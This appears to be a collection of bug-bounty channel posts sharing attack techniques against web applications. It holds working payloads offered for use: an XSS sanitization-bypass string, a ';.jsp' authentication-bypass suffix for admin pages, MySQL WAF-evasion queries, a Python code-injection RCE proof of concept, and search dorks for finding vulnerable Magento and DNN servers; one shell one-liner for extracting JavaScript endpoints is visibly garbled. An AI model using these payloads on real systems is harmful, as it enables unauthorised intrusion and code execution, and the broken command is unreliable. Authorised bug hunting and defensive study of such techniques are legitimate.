CVE-2025-54236: Improper Input Validation in Magento (Adobe Commerce), 9.1 rating 🔥

A critical vulnerability disclosed in a recent advisory allows attackers to perform RCE. Exploitation attempts have already been recorded!

Search at Netlas.io:
👉 Link: https://nt.ls/Edck5
👉 Dork: tag.name:"magento" AND http.headers.server:"Apache"

Vendor's advisory: https://helpx.adobe.com/security/products/magento/apsb25-88.html

Hey Hunters,
DarkShadow here back again, dropping an

interesting XSS input sanitization bypass method.

You might have noticed that most websites currently use input sanitization by blocking certain tags and events, right!? Not really 😅

Okay, so first, have a look at some example tags that could trigger XSS:

script, img, a, iframe, object, video, audio, form, meta

The website blocks these keywords if they appear inside tags like < > or </ > and replaces them with nothing — basically, null or an empty string "".

So, if you try a payload like:

<script>alert(1)</script>

It will be replaced with:

alert(1)

Now, think a bit more deeply — what if you write a payload like this:

<script <img>> alert(1) </script </img>>

In this payload, look at the first part:

<script <img>>

Here, <img> is a full image tag, and it will definitely be removed by the sanitization filter. But what about <script<?

You can see the <script> tag isn’t written properly yet — it’s <script followed by <, so it doesn’t match the sanitization logic exactly.

Now, the interesting part is when the <img> tag gets removed from <script <img>>. After that, we’re left with <script>!

That means the transformation is like this:

<script <img>> → remove <img> → <script>

</script </img>> → remove </img> → </script>

And finally, we get a valid payload:

<script>alert(1)</script>

So guys, if you really like reading DarkShadow’s methodologies, show your LOVE.

And don’t forget to follow me 👉🏼 x.com/darkshadow2bd

#bugbountytips #xss

Extract all endpoints from a JS File and take your bug 🐞

- Method one
waybackurls HOSTS | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?
15*[=: 1\5*[ '\"]?[^'\"]+.js[^'|"> ]*" | awk -F '/'
'{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh
-c "curl -k -s \"%)" | sed \"s/[;}\)>]/\n/g\" | grep -Po \" (L'1|\"](https?: )?[/1{1,2}[^'||l"> 1{5,3)|(\.
(get|post|ajax|load)\s*\(\5*['||\"](https?:)?[/1{1,2}[^'||\"> ]
{5,})\"" | awk -F "['|"]" '{print $2}' sort -fu

- Method two
cat JS.txt | grep -aop "(?<=(\"|\'|' ))\/[a-zA-Z0-9?&=\/-#.](?= (\"||'|'))" | sort -u | tee JS.txt

#infosec #cybersec #bugbountytips

Hey Hunter's,
Darkshadow here back again!

✨Authentication bypass method:

✅Steps:
1. Target..com/carbon/server-admin/memory_info.jsp = redirect to login page [301 status]

2. Target..com/carbon/server-admin/memory_info.jsp;.jsp = gives the page content without authentication [200 status]

Payload 👉🏼 ;.jsp

Tip:
1. Find sensitive path from js file which need authentication.
2. Try to find endpoints which end with a extension like: .php, .jsp, .shtml etc.
3. Simply Fuzz every endpoint with the same extension payload like: ;.jsp ;.php ;.shtml

If any of these gives 200ok check manually. And might it's works!

Don't forget to show your loves guy's ❤️

🚨CVE-2025-64095 (CVSS 10.0) : A Critical Flaw in DNN Platform Allows Unauthenticated Website Overwrite

⚡Dorks
HUNTER : https://product.name="DotNetNuke"

Grab all the GF Patterns from different Repositories at one shot !! 🔥

*Link* : https://github.com/thecybertix/GF-Patterns

Join Our New Group-
https://t.iss.one/avascret

NEW THINGS COMING SOON 🔜

⚡️Outdated but Helpful Some MySQL tricks to break some #WAFs out there. ⚔️ by @BRuteLogic

SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`

#infosec #cybersec #bugbountytips

Hey Hunter's,
Darkshadow here back again, and Just Look at the wild thing:

User 1 Password:
protecting_my_accounts_with_long_readable_passwords123

User 2 Password:
protecting_my_accounts_with_long_readable_passwords456


If the web application using bcrypt hash algorithm then both user can login each other using there different password!

Explanation:
In bcrypt hash, only use first 72 bytes to make hash. That means, after 72 bytes every bytes  (73th, 74th ...) are ignored!

So if the any users first 72 bytes are same  (protecting_my_accounts_with_long_readable_passwords), then no matter after what he put on the password they both can login each other account.

#bugbountytips

Hey Hunter's,
Darkshadow here back again, with another unique RCE method!

💀RCE via Python Code Injection:

✅POC:

{
"name": "darkshadow",
"args": {},
"json_schema": {"type": "object", "properties": {}},
"source_code": "def darkshadow():\n import os\n data='0'.encode('utf-8')\n return ''+os.popen('id').read()"
}

Do you guy's really enjoy to read my methodology's? And if you want more
Guy's then feel free to share your thoughts in the comments ❤️
Don't forget to follow me guys x.com/darkshadow2bd

🌐 Tool of the Day: IPING — IP Lookup & Detection

🔎 Need quick IP facts? IPING lets you lookup any IP or domain
🚀 Instant, accurate, and totally free — returns ISP, country, city, coordinates, ASN, risk score and more. Perfect for OSINT, incident triage, or simple curiosity.
🧭 Try it now: https://www.iping.cc/

#osint #infosec #cybersecurity #recon #bugbounty #tools #ip

🔖The ultimate 403 Bypass wordlists and tester notes by JHaddix

📱 Github: 🔗 Link

---------------------------------------------------------
🚀 𝐋𝐞𝐯𝐞𝐥 𝐔𝐩 𝐘𝐨𝐮𝐫 𝐂𝐲𝐛𝐞𝐫𝐒𝐞𝐜 𝐆𝐚𝐦𝐞! 🔥
🌐 brutsec.com
📱 𝐓𝐞𝐥𝐞𝐠𝐫𝐚𝐦: t.iss.one/brutsecurity
💼 𝐗: x.com/brutsecurity
📖 𝐄𝐭𝐡𝐢𝐜𝐚𝐥 𝐇𝐚𝐜𝐤𝐢𝐧𝐠 𝐑𝐨𝐚𝐝𝐦𝐚𝐩: topmate.io/saumadip/1391531
🎓 𝐂𝐨𝐮𝐫𝐬𝐞 𝐄𝐧𝐫𝐨𝐥𝐥𝐦𝐞𝐧𝐭: wa.link/brutsecurity
⭐ 𝐋𝐢𝐤𝐞 𝐭𝐡𝐢𝐬 𝐩𝐨𝐬𝐭? → 𝐅𝐨𝐥𝐥𝐨𝐰, 𝐉𝐨𝐢𝐧, 𝐒𝐮𝐛𝐬𝐜𝐫𝐢𝐛𝐞 & 𝐒𝐞𝐧𝐝 𝐒𝐭𝐚𝐫𝐬 𝐭𝐨 𝐬𝐡𝐨𝐰 𝐲𝐨𝐮𝐫 𝐬𝐮𝐩𝐩𝐨𝐫𝐭!

#bugbounty #bugbountytips #cybersecurity #infosec #brutsecurity

🛰️ Discover IPING — Your Go-To IP Intelligence Tool

💡 IPING helps you uncover what’s behind any IP address in seconds.

🌍 From location and ASN to proxy status and risk level — all the insights you need for smarter investigations or secure online operations. No sign-up, no limits, only accurate results.

🚀 Explore now: https://www.iping.cc/

Hey Hunter,
what do you think Web Cache to RCE possible or not?
Yes! It’s really very intresting, Post coming Soon.